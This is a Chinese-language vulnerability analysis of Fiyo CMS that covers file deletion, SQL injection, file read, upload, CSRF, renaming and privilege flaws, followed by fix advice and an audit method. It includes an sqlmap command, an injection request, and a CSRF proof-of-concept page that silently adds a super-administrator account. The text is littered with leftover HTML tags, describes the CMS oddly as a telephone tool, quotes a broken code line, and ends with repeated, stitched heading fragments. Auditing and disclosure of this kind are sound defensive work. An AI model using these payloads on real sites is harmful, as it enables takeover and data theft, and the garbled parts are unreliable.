Fiyo CMS 安全漏洞分析与防护指南<\/h1>

1. 系统概述<\/h2>
Fiyo CMS 是一款小型商务电话服务及移动合作工具，最初由一名职业学校学生在 SMK 10 三宝垄学习期间开发，原名 Sirion（Site Administration 的缩写）。<\/p>

2. 漏洞分析<\/h2>

2.1 任意文件删除漏洞<\/h3>

漏洞位置<\/strong>: dapur\apps\app_config\controller\backuper.php<\/code><\/p>

漏洞描述<\/strong>:<\/p>

程序未对用户输入的 POST 参数进行过滤，直接与路径拼接<\/li> 结合 unlink<\/code> 函数导致任意文件删除<\/li> 该问题存在于 CMS 多处位置<\/li> <\/ul> 漏洞代码<\/strong>:<\/p> \/\/ 第10行代码存在路径穿越问题 <\/span><\/span><\/span><\/span>$file =<\/span> $_POST['file'<\/span>]; \/\/ 未过滤用户输入 <\/span><\/span><\/span><\/span>unlink<\/span>($file); \/\/ 直接删除文件 <\/span><\/span><\/span><\/code><\/pre>2.2 SQL 注入漏洞<\/h3> 注入点一<\/h4> 漏洞位置<\/strong>: dapur\apps\app_user\controller\status.php<\/code><\/p> 漏洞描述<\/strong>:<\/p> update<\/code> 方法中直接拼接 $where<\/code> 变量<\/li> 可利用 SQLMap 进行验证<\/li> <\/ul> 利用方法<\/strong>:<\/p> 保存请求包为 headers.txt<\/code><\/li> 修改参数 id=1<\/code> 为 id=1*<\/code><\/li> 执行命令: sqlmap -r headers.txt --batch --dbs<\/code><\/li> <\/ol> 注入点二<\/h4> 漏洞位置<\/strong>: system\function.php<\/code> 中的 oneQuery<\/code> 方法<\/p> 漏洞代码<\/strong>:<\/p> function<\/span> oneQuery<\/span>($table,$field,$value,$output =<\/span> null<\/span>) { <\/span><\/span> $value =<\/span> str_replace<\/span>($value); \/\/ 过滤不充分 <\/span><\/span><\/span><\/span> $query =<\/span> FQuery<\/span>($table,"<\/span>$field<\/span>='<\/span>$value<\/span>'"<\/span>,$output,null<\/span>,null<\/span>,$output,1<\/span>); <\/span><\/span> return<\/span> $query; <\/span><\/span>} <\/span><\/span><\/code><\/pre>利用示例<\/strong>:<\/p> POST<\/span> \/fiyocms\/dapur\/index.php?app=menu&view=edit&id=126'`test%23&theme=blank HTTP<\/span>\/<\/span>1.1<\/span> <\/span><\/span>...<\/span> <\/span><\/span>blank=true <\/span><\/span><\/code><\/pre>2.3 文件读取漏洞<\/h3> 漏洞位置<\/strong>: dapur\apps\app_theme\libs\check_file.php<\/code><\/p> 漏洞描述<\/strong>:<\/p> 未过滤 $_GET['src']<\/code> 和 $_GET['name']<\/code> 变量<\/li> 结合 file_get_contents<\/code> 函数导致文件读取<\/li> 限制：只能读取特定后缀文件（html、htm、xhtml、js、jsp、php、css、xml）<\/li> <\/ul> 漏洞代码<\/strong>:<\/p> \/\/ 第5行代码未过滤输入 <\/span><\/span><\/span><\/span>$file =<\/span> $_GET['src'<\/span>]; <\/span><\/span>$content =<\/span> file_get_contents<\/span>($file); <\/span><\/span><\/code><\/pre>2.4 任意文件上传漏洞<\/h3> 漏洞位置<\/strong>: 后台文件管理功能<\/p> 漏洞描述<\/strong>:<\/p> 未对上传文件进行路径检查和后缀名过滤<\/li> 存在路径穿越问题<\/li> <\/ul> 漏洞代码<\/strong>:<\/p> \/\/ 未过滤上传路径和文件名 <\/span><\/span><\/span><\/span>$target_path =<\/span> $_POST['path'<\/span>]; <\/span><\/span>move_uploaded_file<\/span>($_FILES['file'<\/span>]['tmp_name'<\/span>], $target_path); <\/span><\/span><\/code><\/pre>2.5 CSRF 添加超级用户漏洞<\/h3> 漏洞位置<\/strong>: dapur\apps\app_user\sys_user.php<\/code><\/p> 漏洞描述<\/strong>:<\/p> 添加用户功能未使用 token 防护<\/li> 可构造 CSRF 攻击页面添加超级管理员<\/li> <\/ul> POC 示例<\/strong>:<\/p> <html<\/span>> <\/span><\/span><body<\/span>> <\/span><\/span><form<\/span> name<\/span>=<\/span>"csrf"<\/span> action<\/span>=<\/span>"http:\/\/target\/fiyocms\/dapur\/index.php?app=user&act=add"<\/span> method<\/span>=<\/span>"POST"<\/span>> <\/span><\/span> <input<\/span> type<\/span>=<\/span>"hidden"<\/span> name<\/span>=<\/span>"user"<\/span> value<\/span>=<\/span>"attacker"<\/span> \/> <\/span><\/span> <input<\/span> type<\/span>=<\/span>"hidden"<\/span> name<\/span>=<\/span>"password"<\/span> value<\/span>=<\/span>"hacked"<\/span> \/> <\/span><\/span> <input<\/span> type<\/span>=<\/span>"hidden"<\/span> name<\/span>=<\/span>"level"<\/span> value<\/span>=<\/span>"1"<\/span> \/> <\/span> <\/span><\/span> ... <\/span><\/span><\/form<\/span>> <\/span><\/span><script<\/span>>document.csrf<\/span>.submit<\/span>();<\/script<\/span>> <\/span><\/span><\/body<\/span>> <\/span><\/span><\/html<\/span>> <\/span><\/span><\/code><\/pre>2.6 任意文件名修改漏洞<\/h3> 漏洞位置<\/strong>: dapur\apps\app_config\sys_config.php<\/code><\/p> 漏洞描述<\/strong>:<\/p> 修改后台路径功能未对输入进行过滤<\/li> 可将 config.php<\/code> 改为 config.txt<\/code> 直接查看配置<\/li> <\/ul> 2.7 越权漏洞<\/h3> 漏洞位置<\/strong>: dapur\apps\app_user\sys_user.php<\/code><\/p> 权限等级<\/strong>:<\/p> Super Administrator (1)<\/li> Administrator (2)<\/li> Editor (3)<\/li> Publisher (4)<\/li> Member (5)<\/li> <\/ol> 漏洞描述<\/strong>:<\/p> 执行用户账户操作前未验证用户权限<\/li> 低权限用户可执行高权限操作<\/li> <\/ul> 3. 漏洞修复建议<\/h2> 3.1 文件操作类漏洞修复<\/h3> 对所有用户输入进行严格的路径过滤<\/li> 使用 basename()<\/code> 函数处理文件名<\/li> 限制文件操作目录范围<\/li> 实现白名单机制限制可操作文件类型<\/li> <\/ol> 3.2 SQL 注入修复<\/h3> 使用预处理语句（PDO 或 mysqli）<\/li> 对所有动态 SQL 参数进行类型检查和转义<\/li> 实现统一的数据库查询接口<\/li> <\/ol> 3.3 CSRF 防护<\/h3> 为所有敏感操作添加 CSRF token<\/li> 检查 Referer 头<\/li> 关键操作使用 POST 方法<\/li> <\/ol> 3.4 权限控制改进<\/h3> 实现严格的权限检查中间件<\/li> 每次操作前验证用户权限<\/li> 实现基于角色的访问控制（RBAC）<\/li> <\/ol> 3.5 文件上传安全<\/h3> 限制上传文件类型（白名单）<\/li> 随机化存储文件名<\/li> 将上传文件存储在非 web 可访问目录<\/li> 检查文件内容而不仅依赖扩展名<\/li> <\/ol> 4. 审计方法论<\/h2> 功能导向审计<\/strong>：根据后台提供的功能快速定位相关代码<\/li> 输入点追踪<\/strong>：关注所有用户可控输入点（GET\/POST\/COOKIE等）<\/li> 危险函数检查<\/strong>：重点关注以下函数使用情况：文件操作：unlink<\/code>, file_get_contents<\/code>, move_uploaded_file<\/code><\/li> 数据库操作：直接拼接的 SQL 查询<\/li> 系统命令：exec<\/code>, system<\/code>, passthru<\/code><\/li> <\/ul> <\/li> 权限验证检查<\/strong>：验证所有敏感操作前的权限检查逻辑<\/li> <\/ol> 5. 总结<\/h2> Fiyo CMS 存在的主要安全问题包括：<\/p> 普遍缺乏输入过滤，特别是路径相关操作<\/li> 多处 SQL 注入风险<\/li> 权限控制不严格<\/li> 缺乏基本的安全防护机制（CSRF token 等）<\/li> <\/ol> 开发人员应建立安全意识，对所有用户输入保持怀疑态度，实现统一的安全过滤机制，并定期进行代码安全审计。<\/p>

Fiyo CMS 安全漏洞分析与防护指南<\/h1>

1. 系统概述<\/h2> Fiyo CMS 是一款小型商务电话服务及移动合作工具，最初由一名职业学校学生在 SMK 10 三宝垄学习期间开发，原名 Sirion（Site Administration 的缩写）。<\/p>

2. 漏洞分析<\/h2>

2.2 SQL 注入漏洞<\/h3>

3. 漏洞修复建议<\/h2>

1. 系统概述<\/h2>
Fiyo CMS 是一款小型商务电话服务及移动合作工具，最初由一名职业学校学生在 SMK 10 三宝垄学习期间开发，原名 Sirion（Site Administration 的缩写）。<\/p>